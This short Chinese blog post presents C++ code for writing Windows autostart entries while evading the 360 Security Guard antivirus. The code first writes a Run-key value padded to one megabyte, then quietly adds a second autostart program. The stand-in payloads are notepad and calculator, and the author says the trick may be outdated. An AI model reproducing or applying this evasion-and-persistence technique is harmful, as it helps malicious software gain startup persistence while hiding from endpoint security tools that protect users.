绕过360安全卫士写自启动项

  • 发表于
  • VC

360把自启逼上死路,系统各种敏感操作全监控,服务注册强上线什么的,,意义都不大了,很多人去掉了自启;

但在我看来这样已经推动了本身的意义了,下边这方法也有些老了不一定有用,但也是种思路

360的各种误报误杀,将会越来越多,你成立再及时的误报检测部门也没用,这跟你小偷小摸的做法相扣

360安全卫士写自启动项

int _tmain(int argc, _TCHAR* argv[])
{
HKEY hKey;
char *Path,*Path2="c:\\windows\\notepad.exe --";
LONG ret;
ret=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
if(ret)
{
 printf("打开注册表项失败");
 return 0;
}
Path=new char[1024*1024];
memset(Path,'p',1024*1024);
memcpy(Path,Path2,strlen(Path2));
ret=RegSetValueEx(hKey,"TEST",0,REG_SZ,(BYTE *)Path,strlen(Path));
if(ret==0)
{
 printf("写入成功");
}
else
{
 printf("写入失败");
}
strcpy(Path,"c:\\windows\\system32\\calc.exe");
ret=RegSetValueEx(hKey,"TEST2",0,REG_SZ,(BYTE *)Path,strlen(Path));
if(ret==0)
{
 printf("写入成功");
}
else
{
 printf("写入失败");
}
return 0;
}